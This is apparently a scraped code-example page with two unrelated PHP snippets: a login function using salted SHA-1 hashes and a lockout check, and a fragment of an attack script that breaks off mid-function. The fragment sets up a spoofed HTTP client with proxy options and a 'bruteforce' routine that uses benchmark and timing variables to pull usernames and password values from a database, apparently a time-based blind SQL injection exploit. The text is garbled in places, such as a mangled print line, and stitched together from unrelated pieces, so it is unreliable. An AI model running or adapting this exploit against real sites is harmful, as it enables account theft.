Beispiel #1
0
function login_pro($email, $password, $db)
{
    if ($query = $db->prepare("Select id,usename,password,salt from login where email=?")) {
        $query->bind_param('s', $email);
        $query->execute();
        $query->store_result();
        $query->bind_result($user_id, $username, $p_word, $salt);
        $query->fetch();
        $password = hash('sha1', $password . $salt);
        if ($query->num_rows == 1) {
            if (bruteforce($user_id, $db) == true) {
                // Account is locked
                header('Location: acclocked.php');
            } else {
                // Check if the password in the database matches
                // the password the user submitted.
                if ($p_word == $password) {
                    ins_token($db, $email);
                    return true;
                } else {
                    // Password is not correct
                    // We record this attempt in the database
                    $now = time();
                    $db->query("INSERT INTO attempts(user_id, time)\n                                    VALUES ('{$user_id}', '{$now}')");
                    return false;
                }
            }
        } else {
            // No user exists.
            return false;
        }
    }
}
Beispiel #2
0
$xpl->agent('Mozilla Firefox');
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($proxyauth) {
    $xpl->proxyauth($proxyauth);
}
if ($debug) {
    debug(1);
}
print "\nUsername: "******"\nPassword: ";
bruteforce('pwd');
exit(0);
function bruteforce($field)
{
    global $url, $xpl, $tblprfix, $truetime, $debug, $benchmark, $sql, $bef, $aft, $fak, $b, $c, $f, $dfield, $a, $result;
    $a = 0;
    $v = '';
    $dfield = $field;
    if (eregi('a', $field)) {
        $b = '-1';
        $c = '127';
    } else {
        $b = '46';
        $c = '70';
    }
    # pwd charset